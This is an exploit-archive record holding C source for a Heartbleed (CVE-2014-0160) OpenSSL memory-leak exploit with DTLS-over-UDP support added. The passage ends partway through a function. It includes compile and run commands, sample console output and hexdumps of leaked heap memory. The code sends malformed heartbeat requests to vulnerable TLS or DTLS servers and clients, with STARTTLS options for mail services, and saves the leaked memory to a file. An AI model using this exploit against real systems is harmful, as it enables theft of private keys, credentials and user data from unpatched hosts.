"id": "1337DAY-ID-22172", "href": "https://0day.today/exploit/description/22172", "type": "zdt", "title": "Heartbleed OpenSSL - Information Leak Exploit (2) - DTLS Support", "sourceData": "/*\r\n* CVE-2014-0160 heartbleed OpenSSL information leak exploit\r\n* =========================================================\r\n* This exploit uses OpenSSL to create an encrypted connection\r\n* and trigger the heartbleed leak. The leaked information is\r\n* returned within encrypted SSL packets and is then decrypted\r\n* and wrote to a file to annoy IDS/forensics. The exploit can\r\n* set heartbeat payload length arbitrarily or use two preset\r\n* values for NULL and MAX length. The vulnerability occurs due\r\n* to bounds checking not being performed on a heap value which\r\n* is user supplied and returned to the user as part of DTLS/TLS\r\n* heartbeat SSL extension. All versions of OpenSSL 1.0.1 to\r\n* 1.0.1f are known affected. You must run this against a target\r\n* which is linked to a vulnerable OpenSSL library using DTLS/TLS.\r\n* This exploit leaks upto 65532 bytes of remote heap each request\r\n* and can be run in a loop until the connected peer ends connection.\r\n* The data leaked contains 16 bytes of random padding at the end.\r\n* The exploit can be used against a connecting client or server,\r\n* it can also send pre_cmd's to plain-text services to establish\r\n* an SSL session such as with STARTTLS on SMTP/IMAP/POP3. Clients\r\n* will often forcefully close the connection during large leak\r\n* requests so try to lower your payload request size.\r\n*\r\n* Compiled on ArchLinux x86_64 gcc 4.8.2 20140206 w/OpenSSL 1.0.1g\r\n*\r\n* E.g.\r\n* $ gcc -lssl -lssl3 -lcrypto heartbleed.c -o heartbleed\r\n* $ ./heartbleed -s 192.168.11.23 -p 443 -f out -t 1\r\n* [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\r\n* [ =============================================================\r\n* [ connecting to 192.168.11.23 443/tcp\r\n* [ connected to 192.168.11.23 443/tcp\r\n* [ <3 <3 <3 heart bleed <3 <3 <3\r\n* [ heartbeat returned type=24 length=16408\r\n* [ decrypting SSL packet\r\n* [ heartbleed leaked length=65535\r\n* [ final record type=24, length=16384\r\n* [ wrote 16381 bytes of heap to file 'out'\r\n* [ heartbeat returned type=24 length=16408\r\n* [ decrypting SSL packet\r\n* [ final record type=24, length=16384\r\n* [ wrote 16384 bytes of heap to file 'out'\r\n* [ heartbeat returned type=24 length=16408\r\n* [ decrypting SSL packet\r\n* [ final record type=24, length=16384\r\n* [ wrote 16384 bytes of heap to file 'out'\r\n* [ heartbeat returned type=24 length=16408\r\n* [ decrypting SSL packet\r\n* [ final record type=24, length=16384\r\n* [ wrote 16384 bytes of heap to file 'out'\r\n* [ heartbeat returned type=24 length=42\r\n* [ decrypting SSL packet\r\n* [ final record type=24, length=18\r\n* [ wrote 18 bytes of heap to file 'out'\r\n* [ done.\r\n* $ ls -al out\r\n* -rwx------ 1 fantastic fantastic 65554 Apr 11 13:53 out\r\n* $ hexdump -C out\r\n* - snip - snip \r\n*\r\n* Use following example command to generate certificates for clients.\r\n*\r\n* $ openssl req -x509 -nodes -days 365 -newkey rsa:2048 \\\r\n* -keyout server.key -out server.crt\r\n*\r\n* Debian compile with \"gcc heartbleed.c -o heartbleed -Wl,-Bstatic \\\r\n* -lssl -Wl,-Bdynamic -lssl3 -lcrypto\"\r\n*\r\n* todo: add udp/dtls support.\r\n*\r\n* - Hacker Fantastic\r\n* http://www.mdsec.co.uk\r\n*\r\n*/\r\n \r\n/* Modified by Ayman Sagy aymansagy @ gmail.com - Added DTLS over UDP support\r\n*\r\n* use -u switch, tested against s_server/s_client version 1.0.1d\r\n*\r\n* # openssl s_server -accept 990 -cert ssl.crt -key ssl.key -dtls1\r\n* ...\r\n* # ./heartbleed -s 192.168.75.235 -p 990 -f eshta -t 1 -u\r\n* [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\r\n* [ =============================================================\r\n* [ <3 <3 <3 heart bleed <3 <3 <3\r\n* [ heartbeat returned type=24 length=1392\r\n* [ decrypting SSL packet\r\n* [ heartbleed leaked length=1336\r\n* [ final record type=24, length=1355\r\n* [ wrote 1352 bytes of heap to file 'eshta'\r\n*\r\n*\r\n* # hexdump -C eshta\r\n* 00000000 00 00 00 00 06 30 f1 95 08 00 00 00 00 00 00 00 |.....0..........|\r\n* 00000010 8c 43 64 ab e3 89 6b fd e3 d3 74 a1 a1 31 8c 35 |.Cd...k...t..1.5|\r\n* 00000020 09 6d b9 e7 08 08 08 08 08 08 08 08 08 a1 65 9f |.m............e.|\r\n* 00000030 ca 13 80 7c a5 88 b0 c9 d5 f6 7b 14 fe ff 00 00 |...|......{.....|\r\n* 00000040 00 00 00 00 00 03 00 01 01 16 fe ff 00 01 00 00 |................|\r\n* 00000050 00 00 00 00 00 40 b5 fd a5 10 da c4 fd fb c7 d2 |[email\u00a0protected]|\r\n* 00000060 9f 0c 56 4b a9 9c 14 00 00 0c 00 03 00 00 00 00 |..VK............|\r\n* 00000070 00 0c 69 ec c4 d5 f3 38 ae e5 2e 3a 1a 32 f9 30 |..i....8...:.2.0|\r\n* 00000080 7f 61 4c 8c d7 34 f3 02 08 3f 68 01 a9 a7 81 55 |.aL..4...?h....U|\r\n* 00000090 01 c9 03 03 03 03 00 00 0e 31 39 32 2e 31 36 38 |.........192.168|\r\n* 000000a0 2e 37 35 2e 32 33 35 00 23 00 00 00 0f 00 01 01 |.75.235.#.......|\r\n* 000000b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|\r\n*\r\n* 00000530 00 00 00 00 00 00 00 00 a5 e2 f5 67 d6 23 85 49 |...........g.#.I|\r\n* 00000540 b3 cc ed c4 d2 74 c8 97 c1 b4 cc |.....t.....|\r\n* 0000054b\r\n*\r\n*\r\n* # openssl s_client -connect localhost:990 -dtls1\r\n* ...\r\n* # ./heartbleed -b localhost -p 990 -u -t 1 -f eshta\r\n* [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\r\n* [ =============================================================\r\n* [ SSL connection using AES256-SHA\r\n* [ <3 <3 <3 heart bleed <3 <3 <3\r\n* [ heartbeat returned type=24 length=1392\r\n* [ decrypting SSL packet\r\n* [ heartbleed leaked length=1336\r\n* [ final record type=24, length=1355\r\n* [ wrote 1352 bytes of heap to file 'eshta'\r\n*\r\n*\r\n* # hexdump -C eshta\r\n* 00000000 00 00 24 4e b7 00 00 00 00 00 00 00 00 18 00 00 |..$N............|\r\n* 00000010 cf d0 5f df c3 64 5f 58 79 17 f8 f7 22 9b 28 6e |.._..d_Xy...\".(n|\r\n* 00000020 c0 e7 d6 a3 08 08 08 08 08 08 08 08 08 9b c3 38 |...............8|\r\n* 00000030 2b 32 5f dd 3a d5 0f 83 51 02 2f 70 33 8f cf 82 |+2_.:...Q./p3...|\r\n* 00000040 21 5b cc 25 80 26 f3 29 c8 90 91 ec 5c 83 68 ee |![.%.&.)....\\.h.|\r\n* 00000050 6b 11 0d ad f1 f4 da 9e 13 59 8f 2a 74 f6 d4 35 |k........Y.*t..5|\r\n* 00000060 9e 17 12 7c 2b 6f 9e a8 1e b4 7a 3c a5 ec 18 e0 |...|+o....z<....|\r\n* 00000070 44 b2 51 e4 69 8c 47 29 39 fb 9e b0 dd 5b 05 4d |D.Q.i.G)9....[.M|\r\n* 00000080 db 11 06 7b 1d 08 58 60 ac 34 3f 2d d1 14 c1 b7 |...{..X`.4?-....|\r\n* 00000090 d5 08 59 73 16 28 f8 75 23 f7 85 27 48 be 1f 14 |..Ys.(.u#..'H...|\r\n* 000000a0 fe ff 00 00 00 00 00 00 00 04 00 01 01 16 fe ff |................|\r\n* 000000b0 00 01 00 00 00 00 00 00 00 40 62 1c 02 19 45 5f |[email\u00a0protected]_|\r\n* 000000c0 2c a6 89 95 d2 bf 16 c4 8b b7 14 00 00 0c 00 04 |,...............|\r\n* 000000d0 00 00 00 00 00 0c e9 fb 75 02 61 90 be 4d f7 82 |........u.a..M..|\r\n* 000000e0 06 d6 fd 6d 53 a1 d5 44 e0 5a 0d 6a 6a 94 ef e8 |...mS..D.Z.jj...|\r\n* 000000f0 4c 01 4b cb 86 73 03 03 03 03 2d 53 74 61 74 65 |L.K..s....-State|\r\n* 00000100 31 21 30 1f 06 03 55 04 0a 0c 18 49 6e 74 65 72 |1!0...U....Inter|\r\n* 00000110 6e 65 74 20 57 69 64 67 69 74 73 20 50 74 79 20 |net Widgits Pty |\r\n* 00000120 4c 74 64 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 |Ltd0..\"0...*.H..|\r\n* 00000130 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 |...........0....|\r\n* 00000140 82 01 01 00 c0 85 26 4a 9d cd f8 5e 46 74 fa 89 |......&J...^Ft..|\r\n* 00000150 e3 7d 58 76 23 ba ba dc b1 35 98 35 a5 ba 53 a1 |.}Xv#....5.5..S.|\r\n* 00000160 5b 37 28 fe f7 d0 02 fc fd c9 e3 b1 ee e6 fe 79 |[7(............y|\r\n* 00000170 86 f8 81 1a 29 29 a9 81 95 1c c9 5c 81 a2 e8 0c |....)).....\\....|\r\n* 00000180 35 b7 cb 67 8a ec 2a d1 73 e6 70 78 53 c8 50 91 |5..g..*.s.pxS.P.|\r\n* 00000190 49 07 db e1 a4 08 7b fb 07 54 48 85 45 c2 38 71 |I.....{..TH.E.8q|\r\n* 000001a0 6a 8a f2 4d a7 ba 1a 86 36 a2 ae bb a1 e1 7c 2c |j..M....6.....|,|\r\n* 000001b0 12 04 ce e5 d1 75 24 94 1c 31 2c 46 b7 76 30 3a |.....u$..1,F.v0:|\r\n* 000001c0 04 79 2f b3 65 74 fb ae c7 10 a5 da a8 2d b6 fd |.y/.et.......-..|\r\n* 000001d0 cf f9 11 fe 38 cd 25 7e 13 75 14 1d 58 92 bb 3f |....8.%~.u..X..?|\r\n* 000001e0 8f 75 d5 52 f7 27 66 ca 5d 55 4d 0a b5 71 a2 16 |.u.R.'f.]UM..q..|\r\n* 000001f0 3e 01 af 97 93 eb 5c 3f e0 fa c8 61 2c a1 87 8f |>.....\\?...a,...|\r\n* 00000200 60 d4 df 5d 9d cd 0f 34 a9 66 6c 93 d8 5f 4a 2b |`..]...4.fl.._J+|\r\n* 00000210 fd 67 3a 2f 88 90 b4 e9 f5 d6 ee bb 7d 8b 1c e5 |.g:/........}...|\r\n* 00000220 f2 cc 4f b2 c0 dc e8 1b 4c 6e 51 c9 47 8b 6c 82 |..O.....LnQ.G.l.|\r\n* 00000230 f9 4b ae 01 a8 f9 6c 6d d5 1a d5 cf 63 f4 7f e0 |.K....lm....c...|\r\n* 00000240 96 54 3f 7d 02 03 01 00 01 a3 50 30 4e 30 1d 06 |.T?}......P0N0..|\r\n* 00000250 03 55 1d 0e 04 16 04 14 af 97 4e 87 62 8a 77 b8 |.U........N.b.w.|\r\n* 00000260 b4 0b 24 20 35 b1 66 09 55 3f 74 1d 30 1f 06 03 |..$ 5.f.U?t.0...|\r\n* 00000270 55 1d 23 04 18 30 16 80 14 af 97 4e 87 62 8a 77 |U.#..0.....N.b.w|\r\n* 00000280 b8 b4 0b 24 20 35 b1 66 09 55 3f 74 1d 30 0c 06 |...$ 5.f.U?t.0..|\r\n* 00000290 03 55 1d 13 04 05 30 03 01 01 ff 30 0d 06 09 2a |.U....0....0...*|\r\n* 000002a0 86 48 86 f7 0d 01 01 05 05 00 03 82 01 01 00 b0 |.H..............|\r\n* 000002b0 8e 40 58 2d 86 32 95 11 a7 a1 64 1d fc 08 8d 87 |[email\u00a0protected]|\r\n* 000002c0 18 d3 5d c6 a0 bb 84 4a 50 f5 27 1c 15 4b 02 0c |..]....JP.'..K..|\r\n* 000002d0 49 1f 2d 0a 52 d3 98 6b 71 3d b9 0f 36 24 d3 77 |I.-.R..kq=..6$.w|\r\n* 000002e0 e0 d0 a5 50 e5 ea 2d 67 11 69 4d 45 52 97 4d 58 |...P..-g.iMER.MX|\r\n* 000002f0 de 22 06 02 6d 21 80 2f 0d 1c d5 d5 80 5c 8f 44 |.\"..m!./.....\\.D|\r\n* 00000300 1e b6 f3 41 4c dc d3 40 8d 54 ac b0 ca 8f 19 6a |[email\u00a0protected]|\r\n* 00000310 4d f2 fb ad 68 5a 99 19 ca ae b2 f5 54 70 29 96 |M...hZ......Tp).|\r\n* 00000320 84 7e ba a9 6b 42 e6 68 32 dc 65 87 b1 b7 17 22 |.~..kB.h2.e....\"|\r\n* 00000330 e3 cc 62 97 e4 fa 64 0b 1e 70 bf e5 a2 40 e4 49 |[email\u00a0protected]|\r\n* 00000340 24 f9 05 3f 2e fe 7c 38 56 39 4d bd 51 63 0d 79 |$..?..|8V9M.Qc.y|\r\n* 00000350 85 c0 4b 1a 46 64 e0 fe a8 87 bf c7 4d 21 cb 79 |..K.Fd......M!.y|\r\n* 00000360 37 e7 a6 e3 6c 3b ed 35 17 73 7a 71 c6 72 2f bb |7...l;.5.szq.r/.|\r\n* 00000370 58 dc ef e9 1e a3 89 5e 70 cd 95 10 87 c1 8a 7e |X......^p......~|\r\n* 00000380 e7 51 c2 22 67 66 ee 22 f9 a5 2e 31 f2 ad fc 3b |.Q.\"gf.\"...1...;|\r\n* 00000390 98 c8 30 63 ef 74 b5 4e c4 bd c7 a2 46 0a b8 bf |..0c.t.N....F...|\r\n* 000003a0 df a8 54 0e 4f 37 d0 a5 27 a3 f3 a7 28 38 3f 16 |..T.O7..'...(8?.|\r\n* 000003b0 fe ff 00 00 00 00 00 00 00 02 00 0c 0e 00 00 00 |................|\r\n* 000003c0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|\r\n* 000003d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|\r\n* *\r\n* 00000530 00 00 00 00 00 00 00 00 82 8f be ff cf 26 12 9d |.............&..|\r\n* 00000540 a2 de 0c 44 21 4a 54 be 41 4c df |...D!JT.AL.|\r\n* 0000054b\r\n*\r\n*/\r\n#include <stdio.h>\r\n#include <stdint.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <getopt.h>\r\n#include <signal.h>\r\n#include <netdb.h>\r\n#include <fcntl.h>\r\n#include <errno.h>\r\n#include <sys/socket.h>\r\n#include <sys/types.h>\r\n#include <netinet/in.h>\r\n#include <inttypes.h>\r\n#include <openssl/bio.h>\r\n#include <openssl/ssl.h>\r\n#include <openssl/err.h>\r\n#include <openssl/evp.h>\r\n#include <openssl/tls1.h>\r\n#include <openssl/rand.h>\r\n#include <openssl/buffer.h>\r\n \r\n#define n2s(c,s)((s=(((unsigned int)(c[0]))<< 8)| \\\r\n (((unsigned int)(c[1])) )),c+=2)\r\n#define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), \\\r\n c[1]=(unsigned char)(((s) )&0xff)),c+=2)\r\n \r\nint first = 0;\r\nint leakbytes = 0;\r\nint repeat = 1;\r\nint badpackets = 0;\r\n \r\ntypedef struct {\r\n int socket;\r\n SSL *sslHandle;\r\n SSL_CTX *sslContext;\r\n} connection;\r\n \r\ntypedef struct {\r\n unsigned char type;\r\n short version;\r\n unsigned int length;\r\n unsigned char hbtype;\r\n unsigned int payload_length;\r\n void* payload;\r\n} heartbeat;\r\n \r\nvoid ssl_init();\r\nvoid usage();\r\nint tcp_connect(char*,int);\r\nint tcp_bind(char*, int);\r\nconnection* tls_connect(int);\r\nconnection* tls_bind(int);\r\nint pre_cmd(int,int,int);\r\nvoid* heartbleed(connection* ,unsigned int);\r\nvoid* sneakyleaky(connection* ,char*, int);\r\n \r\nstatic DTLS1_BITMAP *dtls1_get_bitmap(SSL *s, SSL3_RECORD *rr, unsigned int *is_next_epoch);\r\nstatic int dtls1_record_replay_check(SSL *s, DTLS1_BITMAP *bitmap);\r\nstatic int dtls1_buffer_record(SSL *s, record_pqueue *q, unsigned char *priority);\r\nstatic void dtls1_record_bitmap_update(SSL *s, DTLS1_BITMAP *bitmap);\r\n \r\nint tcp_connect(char* server,int port){\r\n int sd,ret;\r\n struct hostent *host;\r\n struct sockaddr_in sa;\r\n host = gethostbyname(server);\r\n sd = socket(AF_INET, SOCK_STREAM, 0);\r\n if(sd==-1){\r\n printf(\"[!] cannot create socket\\n\");\r\n exit(0);\r\n }\r\n sa.sin_family = AF_INET;\r\n sa.sin_port = htons(port);\r\n sa.sin_addr = *((struct in_addr *) host->h_addr);\r\n bzero(&(sa.sin_zero),8);\r\n printf(\"[ connecting to %s %d/tcp\\n\",server,port);\r\n ret = connect(sd,(struct sockaddr *)&sa, sizeof(struct sockaddr));\r\n if(ret==0){\r\n printf(\"[ connected to %s %d/tcp\\n\",server,port);\r\n }\r\n else{\r\n printf(\"[!] FATAL: could not connect to %s %d/tcp\\n\",server,port);\r\n exit(0);\r\n }\r\n return sd;\r\n}\r\n \r\nint tcp_bind(char* server, int port){\r\n int sd, ret, val=1;\r\n struct sockaddr_in sin;\r\n struct hostent *host;\r\n host = gethostbyname(server);\r\n sd=socket(AF_INET,SOCK_STREAM,0);\r\n if(sd==-1){\r\n printf(\"[!] cannot create socket\\n\");\r\n exit(0);\r\n }\r\n memset(&sin,0,sizeof(sin));\r\n sin.sin_addr=*((struct in_addr *) host->h_addr);\r\n sin.sin_family=AF_INET;\r\n sin.sin_port=htons(port);\r\n setsockopt(sd,SOL_SOCKET,SO_REUSEADDR,&val,sizeof(val));\r\n ret = bind(sd,(struct sockaddr *)&sin,sizeof(sin));\r\n if(ret==-1){\r\n printf(\"[!] cannot bind socket\\n\");\r\n exit(0);\r\n }\r\n listen(sd,5);\r\n return(sd);\r\n}\r\n \r\nconnection* dtls_server(int sd, char* server,int port){\r\n int bytes;\r\n connection *c;\r\n char* buf;\r\n buf = malloc(4096);\r\n int ret;\r\n struct hostent *host;\r\n struct sockaddr_in sa;\r\n unsigned long addr;\r\n if ((host = gethostbyname(server)) == NULL) {\r\n perror(\"gethostbyname\");\r\n exit(1);\r\n }\r\n sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);\r\n if(sd==-1){\r\n printf(\"[!] cannot create socket\\n\");\r\n exit(0);\r\n }\r\n sa.sin_family = AF_INET;\r\n sa.sin_port = htons(port);\r\n sa.sin_addr = *((struct in_addr *) host->h_addr);\r\n if (bind(sd, (struct sockaddr *) &sa ,sizeof(struct sockaddr_in)) < 0) {\r\n perror(\"bind()\");\r\n exit(1);\r\n }\r\n \r\n BIO *bio;\r\n if(c==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n if(buf==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n memset(buf,0,4096);\r\n c = malloc(sizeof(connection));\r\n if(c==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n c->socket = sd;\r\n c->sslHandle = NULL;\r\n c->sslContext = NULL;\r\n c->sslContext = SSL_CTX_new(DTLSv1_server_method());\r\n SSL_CTX_set_read_ahead (c->sslContext, 1);\r\n if(c->sslContext==NULL)\r\n ERR_print_errors_fp(stderr);\r\n SSL_CTX_SRP_CTX_init(c->sslContext);\r\n SSL_CTX_use_certificate_file(c->sslContext, \"./server.crt\", SSL_FILETYPE_PEM);\r\n SSL_CTX_use_PrivateKey_file(c->sslContext, \"./server.key\", SSL_FILETYPE_PEM); \r\n if(!SSL_CTX_check_private_key(c->sslContext)){\r\n printf(\"[!] FATAL: private key does not match the certificate public key\\n\");\r\n exit(0);\r\n }\r\n c->sslHandle = SSL_new(c->sslContext);\r\n if(c->sslHandle==NULL)\r\n ERR_print_errors_fp(stderr);\r\n if(!SSL_set_fd(c->sslHandle,c->socket))\r\n ERR_print_errors_fp(stderr);\r\n bio = BIO_new_dgram(sd, BIO_NOCLOSE);\r\n \r\n SSL_set_bio(c->sslHandle, bio, bio);\r\n SSL_set_accept_state (c->sslHandle);\r\n \r\n int rc = SSL_accept(c->sslHandle);\r\n printf (\"[ SSL connection using %s\\n\", SSL_get_cipher (c->sslHandle));\r\n// bytes = SSL_read(c->sslHandle, buf, 4095);\r\n// printf(\"[ recieved: %d bytes - showing output\\n%s\\n[\\n\",bytes,buf);\r\n if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\r\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\r\n printf(\"[ warning: heartbeat extension is unsupported (try anyway)\\n\");\r\n }\r\n return c;\r\n}\r\n \r\nvoid ssl_init(){\r\n SSL_load_error_strings();\r\n SSL_library_init();\r\n OpenSSL_add_all_digests();\r\n OpenSSL_add_all_algorithms();\r\n OpenSSL_add_all_ciphers();\r\n}\r\n \r\nconnection* tls_connect(int sd){\r\n connection *c;\r\n c = malloc(sizeof(connection));\r\n if(c==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n c->socket = sd;\r\n c->sslHandle = NULL;\r\n c->sslContext = NULL;\r\n c->sslContext = SSL_CTX_new(SSLv23_client_method());\r\n SSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3);\r\n if(c->sslContext==NULL)\r\n ERR_print_errors_fp(stderr);\r\n c->sslHandle = SSL_new(c->sslContext);\r\n if(c->sslHandle==NULL)\r\n ERR_print_errors_fp(stderr);\r\n if(!SSL_set_fd(c->sslHandle,c->socket))\r\n ERR_print_errors_fp(stderr);\r\n if(SSL_connect(c->sslHandle)!=1)\r\n ERR_print_errors_fp(stderr);\r\n if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\r\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\r\n printf(\"[ warning: heartbeat extension is unsupported (try anyway)\\n\");\r\n }\r\n return c;\r\n}\r\n \r\nconnection* dtls_client(int sd, char* server,int port){\r\n int ret;\r\n struct hostent *host;\r\n struct sockaddr_in sa;\r\n connection *c;\r\n memset((char *)&sa,0,sizeof(sa));\r\n c = malloc(sizeof(connection));\r\n if ((host = gethostbyname(server)) == NULL) {\r\n perror(\"gethostbyname\");\r\n exit(1);\r\n }\r\n sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);\r\n if(sd==-1){\r\n printf(\"[!] cannot create socket\\n\");\r\n exit(0);\r\n }\r\n sa.sin_family = AF_INET;\r\n sa.sin_port = htons(port);\r\n sa.sin_addr = *((struct in_addr *) host->h_addr);\r\n if (connect(sd, (struct sockaddr *) &sa ,sizeof(struct sockaddr_in)) < 0) {\r\n perror(\"connect()\");\r\n exit(0);\r\n }\r\n \r\n BIO *bio;\r\n if(c==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n \r\n c->sslContext = NULL;\r\n c->sslContext = SSL_CTX_new(DTLSv1_client_method());\r\n SSL_CTX_set_read_ahead (c->sslContext, 1);\r\n if(c->sslContext==NULL)\r\n ERR_print_errors_fp(stderr);\r\n if(c->sslHandle==NULL)\r\n ERR_print_errors_fp(stderr);\r\n \r\n c->socket = sd;\r\n c->sslHandle = NULL;\r\n c->sslHandle = SSL_new(c->sslContext);\r\n SSL_set_tlsext_host_name(c->sslHandle,server);\r\n bio = BIO_new_dgram(sd, BIO_NOCLOSE);\r\n \r\n BIO_ctrl_set_connected(bio, 1, &sa);\r\n SSL_set_bio(c->sslHandle, bio, bio);\r\n SSL_set_connect_state (c->sslHandle);\r\n//printf(\"eshta\\n\");\r\n if(SSL_connect(c->sslHandle)!=1)\r\n ERR_print_errors_fp(stderr);\r\n \r\n if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\r\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\r\n printf(\"[ warning: heartbeat extension is unsupported (try anyway), %d \\n\",c->sslHandle->tlsext_heartbeat);\r\n }\r\n return c;\r\n}\r\n \r\nconnection* tls_bind(int sd){\r\n int bytes;\r\n connection *c;\r\n char* buf;\r\n buf = malloc(4096);\r\n if(buf==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n memset(buf,0,4096);\r\n c = malloc(sizeof(connection));\r\n if(c==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n c->socket = sd;\r\n c->sslHandle = NULL;\r\n c->sslContext = NULL;\r\n c->sslContext = SSL_CTX_new(SSLv23_server_method());\r\n if(c->sslContext==NULL)\r\n ERR_print_errors_fp(stderr);\r\n SSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3);\r\n SSL_CTX_SRP_CTX_init(c->sslContext);\r\n SSL_CTX_use_certificate_file(c->sslContext, \"./server.crt\", SSL_FILETYPE_PEM);\r\n SSL_CTX_use_PrivateKey_file(c->sslContext, \"./server.key\", SSL_FILETYPE_PEM); \r\n if(!SSL_CTX_check_private_key(c->sslContext)){\r\n printf(\"[!] FATAL: private key does not match the certificate public key\\n\");\r\n exit(0);\r\n }\r\n c->sslHandle = SSL_new(c->sslContext);\r\n if(c->sslHandle==NULL)\r\n ERR_print_errors_fp(stderr);\r\n if(!SSL_set_fd(c->sslHandle,c->socket))\r\n ERR_print_errors_fp(stderr);\r\n int rc = SSL_accept(c->sslHandle);\r\n printf (\"[ SSL connection using %s\\n\", SSL_get_cipher (c->sslHandle));\r\n bytes = SSL_read(c->sslHandle, buf, 4095);\r\n printf(\"[ recieved: %d bytes - showing output\\n%s\\n[\\n\",bytes,buf);\r\n if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\r\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\r\n printf(\"[ warning: heartbeat extension is unsupported (try anyway)\\n\");\r\n }\r\n return c;\r\n}\r\n \r\nint pre_cmd(int sd,int precmd,int verbose){\r\n /* this function can be used to send commands to a plain-text\r\n service or client before heartbleed exploit attempt. e.g. STARTTLS */\r\n int rc, go = 0;\r\n char* buffer;\r\n char* line1;\r\n char* line2; \r\n switch(precmd){\r\n case 0:\r\n line1 = \"EHLO test\\n\";\r\n line2 = \"STARTTLS\\n\";\r\n break;\r\n case 1:\r\n line1 = \"CAPA\\n\";\r\n line2 = \"STLS\\n\";\r\n break;\r\n case 2:\r\n line1 = \"a001 CAPB\\n\";\r\n line2 = \"a002 STARTTLS\\n\";\r\n break;\r\n default:\r\n go = 1;\r\n break;\r\n }\r\n if(go==0){\r\n buffer = malloc(2049);\r\n if(buffer==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n memset(buffer,0,2049);\r\n rc = read(sd,buffer,2048);\r\n printf(\"[ banner: %s\",buffer);\r\n send(sd,line1,strlen(line1),0);\r\n memset(buffer,0,2049);\r\n rc = read(sd,buffer,2048);\r\n if(verbose==1){\r\n printf(\"%s\\n\",buffer);\r\n }\r\n send(sd,line2,strlen(line2),0);\r\n memset(buffer,0,2049);\r\n rc = read(sd,buffer,2048);\r\n if(verbose==1){\r\n printf(\"%s\\n\",buffer);\r\n }\r\n }\r\n return sd;\r\n}\r\n \r\nvoid* heartbleed(connection *c,unsigned int type){\r\n unsigned char *buf, *p;\r\n int ret;\r\n buf = OPENSSL_malloc(1 + 2);\r\n if(buf==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n p = buf;\r\n *p++ = TLS1_HB_REQUEST;\r\n switch(type){\r\n case 0:\r\n s2n(0x0,p);\r\n break;\r\n case 1:\r\n s2n(0xffff,p);\r\n break;\r\n default:\r\n printf(\"[ setting heartbeat payload_length to %u\\n\",type);\r\n s2n(type,p);\r\n break;\r\n }\r\n printf(\"[ <3 <3 <3 heart bleed <3 <3 <3\\n\");\r\n ret = ssl3_write_bytes(c->sslHandle, TLS1_RT_HEARTBEAT, buf, 3);\r\n OPENSSL_free(buf);\r\n return c;\r\n}\r\n \r\nvoid* dtlsheartbleed(connection *c,unsigned int type){\r\n \r\n unsigned char *buf, *p;\r\n int ret;\r\n buf = OPENSSL_malloc(1 + 2 + 16);\r\n memset(buf, '\\0', sizeof buf);\r\n if(buf==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n p = buf;\r\n *p++ = TLS1_HB_REQUEST;\r\n switch(type){\r\n case 0:\r\n s2n(0x0,p);\r\n break;\r\n case 1:\r\n// s2n(0xffff,p);\r\n// s2n(0x3feb,p);\r\n s2n(0x0538,p);\r\n break;\r\n default:\r\n printf(\"[ setting heartbeat payload_length to %u\\n\",type);\r\n s2n(type,p);\r\n break;\r\n }\r\n s2n(c->sslHandle->tlsext_hb_seq, p);\r\n printf(\"[ <3 <3 <3 heart bleed <3 <3 <3\\n\");\r\n \r\n ret = dtls1_write_bytes(c->sslHandle, TLS1_RT_HEARTBEAT, buf, 3 + 16);\r\n \r\n if (ret >= 0)\r\n {\r\n if (c->sslHandle->msg_callback)\r\n c->sslHandle->msg_callback(1, c->sslHandle->version, TLS1_RT_HEARTBEAT,\r\n buf, 3 + 16,\r\n c->sslHandle, c->sslHandle->msg_callback_arg);\r\n \r\n dtls1_start_timer(c->sslHandle);\r\n c->sslHandle->tlsext_hb_pending = 1;\r\n }\r\n \r\n OPENSSL_free(buf);\r\n \r\n return c;\r\n}\r\n \r\nvoid* sneakyleaky(connection *c,char* filename, int verbose){\r\n char *p;\r\n int ssl_major,ssl_minor,al;\r\n int enc_err,n,i;\r\n SSL3_RECORD *rr;\r\n SSL_SESSION *sess;\r\n SSL* s;\r\n unsigned char md[EVP_MAX_MD_SIZE];\r\n short version;\r\n unsigned mac_size, orig_len;\r\n size_t extra;\r\n rr= &(c->sslHandle->s3->rrec);\r\n sess=c->sslHandle->session;\r\n s = c->sslHandle;\r\n if (c->sslHandle->options & SSL_OP_MICROSOFT_BIG_SSLV3_BUFFER)\r\n 